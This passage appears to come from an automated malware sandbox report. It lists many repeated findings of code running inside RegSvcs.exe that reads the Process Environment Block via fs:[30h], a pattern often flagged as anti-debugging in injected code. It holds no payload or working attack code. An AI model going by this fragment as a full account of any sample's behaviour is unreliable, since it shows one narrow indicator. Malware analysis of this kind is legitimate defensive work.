Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3E10E mov eax, dword ptr fs:[00000030h]	9_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3E10E mov eax, dword ptr fs:[00000030h]	9_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3E10E mov ecx, dword ptr fs:[00000030h]	9_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3E10E mov eax, dword ptr fs:[00000030h]	9_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3E10E mov eax, dword ptr fs:[00000030h]	9_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3E10E mov ecx, dword ptr fs:[00000030h]	9_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3E10E mov eax, dword ptr fs:[00000030h]	9_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3E10E mov ecx, dword ptr fs:[00000030h]	9_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A50115 mov eax, dword ptr fs:[00000030h]	9_2_01A50115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0124 mov eax, dword ptr fs:[00000030h]	9_2_019C0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3A118 mov ecx, dword ptr fs:[00000030h]	9_2_01A3A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3A118 mov eax, dword ptr fs:[00000030h]	9_2_01A3A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3A118 mov eax, dword ptr fs:[00000030h]	9_2_01A3A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3A118 mov eax, dword ptr fs:[00000030h]	9_2_01A3A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A64164 mov eax, dword ptr fs:[00000030h]	9_2_01A64164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A64164 mov eax, dword ptr fs:[00000030h]	9_2_01A64164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01996154 mov eax, dword ptr fs:[00000030h]	9_2_01996154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01996154 mov eax, dword ptr fs:[00000030h]	9_2_01996154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198C156 mov eax, dword ptr fs:[00000030h]	9_2_0198C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A24144 mov eax, dword ptr fs:[00000030h]	9_2_01A24144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A24144 mov eax, dword ptr fs:[00000030h]	9_2_01A24144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A24144 mov ecx, dword ptr fs:[00000030h]	9_2_01A24144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A24144 mov eax, dword ptr fs:[00000030h]	9_2_01A24144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A24144 mov eax, dword ptr fs:[00000030h]	9_2_01A24144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A28158 mov eax, dword ptr fs:[00000030h]	9_2_01A28158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A280A8 mov eax, dword ptr fs:[00000030h]	9_2_01A280A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199208A mov eax, dword ptr fs:[00000030h]	9_2_0199208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A560B8 mov eax, dword ptr fs:[00000030h]	9_2_01A560B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A560B8 mov ecx, dword ptr fs:[00000030h]	9_2_01A560B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019880A0 mov eax, dword ptr fs:[00000030h]	9_2_019880A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A160E0 mov eax, dword ptr fs:[00000030h]	9_2_01A160E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198C0F0 mov eax, dword ptr fs:[00000030h]	9_2_0198C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D20F0 mov ecx, dword ptr fs:[00000030h]	9_2_019D20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019980E9 mov eax, dword ptr fs:[00000030h]	9_2_019980E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198A0E3 mov ecx, dword ptr fs:[00000030h]	9_2_0198A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A120DE mov eax, dword ptr fs:[00000030h]	9_2_01A120DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019AE016 mov eax, dword ptr fs:[00000030h]	9_2_019AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019AE016 mov eax, dword ptr fs:[00000030h]	9_2_019AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019AE016 mov eax, dword ptr fs:[00000030h]	9_2_019AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019AE016 mov eax, dword ptr fs:[00000030h]	9_2_019AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A26030 mov eax, dword ptr fs:[00000030h]	9_2_01A26030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A14000 mov ecx, dword ptr fs:[00000030h]	9_2_01A14000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A32000 mov eax, dword ptr fs:[00000030h]	9_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A32000 mov eax, dword ptr fs:[00000030h]	9_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A32000 mov eax, dword ptr fs:[00000030h]	9_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A32000 mov eax, dword ptr fs:[00000030h]	9_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A32000 mov eax, dword ptr fs:[00000030h]	9_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A32000 mov eax, dword ptr fs:[00000030h]	9_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A32000 mov eax, dword ptr fs:[00000030h]	9_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A32000 mov eax, dword ptr fs:[00000030h]	9_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198A020 mov eax, dword ptr fs:[00000030h]	9_2_0198A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198C020 mov eax, dword ptr fs:[00000030h]	9_2_0198C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992050 mov eax, dword ptr fs:[00000030h]	9_2_01992050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BC073 mov eax, dword ptr fs:[00000030h]	9_2_019BC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A16050 mov eax, dword ptr fs:[00000030h]	9_2_01A16050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01988397 mov eax, dword ptr fs:[00000030h]	9_2_01988397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01988397 mov eax, dword ptr fs:[00000030h]	9_2_01988397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01988397 mov eax, dword ptr fs:[00000030h]	9_2_01988397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E388 mov eax, dword ptr fs:[00000030h]	9_2_0198E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E388 mov eax, dword ptr fs:[00000030h]	9_2_0198E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E388 mov eax, dword ptr fs:[00000030h]	9_2_0198E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B438F mov eax, dword ptr fs:[00000030h]	9_2_019B438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B438F mov eax, dword ptr fs:[00000030h]	9_2_019B438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0199A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0199A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0199A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0199A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0199A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0199A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019983C0 mov eax, dword ptr fs:[00000030h]	9_2_019983C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019983C0 mov eax, dword ptr fs:[00000030h]	9_2_019983C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019983C0 mov eax, dword ptr fs:[00000030h]	9_2_019983C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019983C0 mov eax, dword ptr fs:[00000030h]	9_2_019983C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A163C0 mov eax, dword ptr fs:[00000030h]	9_2_01A163C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C63FF mov eax, dword ptr fs:[00000030h]	9_2_019C63FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A4C3CD mov eax, dword ptr fs:[00000030h]	9_2_01A4C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019AE3F0 mov eax, dword ptr fs:[00000030h]	9_2_019AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019AE3F0 mov eax, dword ptr fs:[00000030h]	9_2_019AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019AE3F0 mov eax, dword ptr fs:[00000030h]	9_2_019AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A03E9 mov eax, dword ptr fs:[00000030h]	9_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A03E9 mov eax, dword ptr fs:[00000030h]	9_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A03E9 mov eax, dword ptr fs:[00000030h]	9_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A03E9 mov eax, dword ptr fs:[00000030h]	9_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A03E9 mov eax, dword ptr fs:[00000030h]	9_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A03E9 mov eax, dword ptr fs:[00000030h]	9_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A03E9 mov eax, dword ptr fs:[00000030h]	9_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A03E9 mov eax, dword ptr fs:[00000030h]	9_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A343D4 mov eax, dword ptr fs:[00000030h]	9_2_01A343D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A343D4 mov eax, dword ptr fs:[00000030h]	9_2_01A343D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3E3DB mov eax, dword ptr fs:[00000030h]	9_2_01A3E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3E3DB mov eax, dword ptr fs:[00000030h]	9_2_01A3E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3E3DB mov ecx, dword ptr fs:[00000030h]	9_2_01A3E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3E3DB mov eax, dword ptr fs:[00000030h]	9_2_01A3E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A68324 mov eax, dword ptr fs:[00000030h]	9_2_01A68324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A68324 mov ecx, dword ptr fs:[00000030h]	9_2_01A68324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A68324 mov eax, dword ptr fs:[00000030h]	9_2_01A68324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A68324 mov eax, dword ptr fs:[00000030h]	9_2_01A68324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198C310 mov ecx, dword ptr fs:[00000030h]	9_2_0198C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B0310 mov ecx, dword ptr fs:[00000030h]	9_2_019B0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CA30B mov eax, dword ptr fs:[00000030h]	9_2_019CA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CA30B mov eax, dword ptr fs:[00000030h]	9_2_019CA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CA30B mov eax, dword ptr fs:[00000030h]	9_2_019CA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3437C mov eax, dword ptr fs:[00000030h]	9_2_01A3437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A12349 mov eax, dword ptr fs:[00000030h]	9_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A12349 mov eax, dword ptr fs:[00000030h]	9_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A12349 mov eax, dword ptr fs:[00000030h]	9_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A12349 mov eax, dword ptr fs:[00000030h]	9_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A12349 mov eax, dword ptr fs:[00000030h]	9_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A12349 mov eax, dword ptr fs:[00000030h]	9_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A12349 mov eax, dword ptr fs:[00000030h]	9_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A12349 mov eax, dword ptr fs:[00000030h]	9_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A12349 mov eax, dword ptr fs:[00000030h]	9_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A12349 mov eax, dword ptr fs:[00000030h]	9_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A12349 mov eax, dword ptr fs:[00000030h]	9_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A12349 mov eax, dword ptr fs:[00000030h]	9_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A12349 mov eax, dword ptr fs:[00000030h]	9_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A12349 mov eax, dword ptr fs:[00000030h]	9_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A12349 mov eax, dword ptr fs:[00000030h]	9_2_01A12349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A6634F mov eax, dword ptr fs:[00000030h]	9_2_01A6634F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A38350 mov ecx, dword ptr fs:[00000030h]	9_2_01A38350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5A352 mov eax, dword ptr fs:[00000030h]	9_2_01A5A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1035C mov eax, dword ptr fs:[00000030h]	9_2_01A1035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1035C mov eax, dword ptr fs:[00000030h]	9_2_01A1035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1035C mov eax, dword ptr fs:[00000030h]	9_2_01A1035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1035C mov ecx, dword ptr fs:[00000030h]	9_2_01A1035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1035C mov eax, dword ptr fs:[00000030h]	9_2_01A1035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1035C mov eax, dword ptr fs:[00000030h]	9_2_01A1035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A262A0 mov eax, dword ptr fs:[00000030h]	9_2_01A262A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A262A0 mov ecx, dword ptr fs:[00000030h]	9_2_01A262A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A262A0 mov eax, dword ptr fs:[00000030h]	9_2_01A262A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A262A0 mov eax, dword ptr fs:[00000030h]	9_2_01A262A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A262A0 mov eax, dword ptr fs:[00000030h]	9_2_01A262A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A262A0 mov eax, dword ptr fs:[00000030h]	9_2_01A262A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CE284 mov eax, dword ptr fs:[00000030h]	9_2_019CE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CE284 mov eax, dword ptr fs:[00000030h]	9_2_019CE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A10283 mov eax, dword ptr fs:[00000030h]	9_2_01A10283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A10283 mov eax, dword ptr fs:[00000030h]	9_2_01A10283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A10283 mov eax, dword ptr fs:[00000030h]	9_2_01A10283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A02A0 mov eax, dword ptr fs:[00000030h]	9_2_019A02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A02A0 mov eax, dword ptr fs:[00000030h]	9_2_019A02A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0199A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0199A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0199A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0199A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0199A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A662D6 mov eax, dword ptr fs:[00000030h]	9_2_01A662D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A02E1 mov eax, dword ptr fs:[00000030h]	9_2_019A02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A02E1 mov eax, dword ptr fs:[00000030h]	9_2_019A02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A02E1 mov eax, dword ptr fs:[00000030h]	9_2_019A02E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198823B mov eax, dword ptr fs:[00000030h]	9_2_0198823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01996259 mov eax, dword ptr fs:[00000030h]	9_2_01996259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198A250 mov eax, dword ptr fs:[00000030h]	9_2_0198A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A40274 mov eax, dword ptr fs:[00000030h]	9_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A40274 mov eax, dword ptr fs:[00000030h]	9_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A40274 mov eax, dword ptr fs:[00000030h]	9_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A40274 mov eax, dword ptr fs:[00000030h]	9_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A40274 mov eax, dword ptr fs:[00000030h]	9_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A40274 mov eax, dword ptr fs:[00000030h]	9_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A40274 mov eax, dword ptr fs:[00000030h]	9_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A40274 mov eax, dword ptr fs:[00000030h]	9_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A40274 mov eax, dword ptr fs:[00000030h]	9_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A40274 mov eax, dword ptr fs:[00000030h]	9_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A40274 mov eax, dword ptr fs:[00000030h]	9_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A40274 mov eax, dword ptr fs:[00000030h]	9_2_01A40274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A18243 mov eax, dword ptr fs:[00000030h]	9_2_01A18243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A18243 mov ecx, dword ptr fs:[00000030h]	9_2_01A18243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198826B mov eax, dword ptr fs:[00000030h]	9_2_0198826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A4A250 mov eax, dword ptr fs:[00000030h]	9_2_01A4A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A4A250 mov eax, dword ptr fs:[00000030h]	9_2_01A4A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01994260 mov eax, dword ptr fs:[00000030h]	9_2_01994260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01994260 mov eax, dword ptr fs:[00000030h]	9_2_01994260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01994260 mov eax, dword ptr fs:[00000030h]	9_2_01994260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A6625D mov eax, dword ptr fs:[00000030h]	9_2_01A6625D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CE59C mov eax, dword ptr fs:[00000030h]	9_2_019CE59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A105A7 mov eax, dword ptr fs:[00000030h]	9_2_01A105A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A105A7 mov eax, dword ptr fs:[00000030h]	9_2_01A105A7
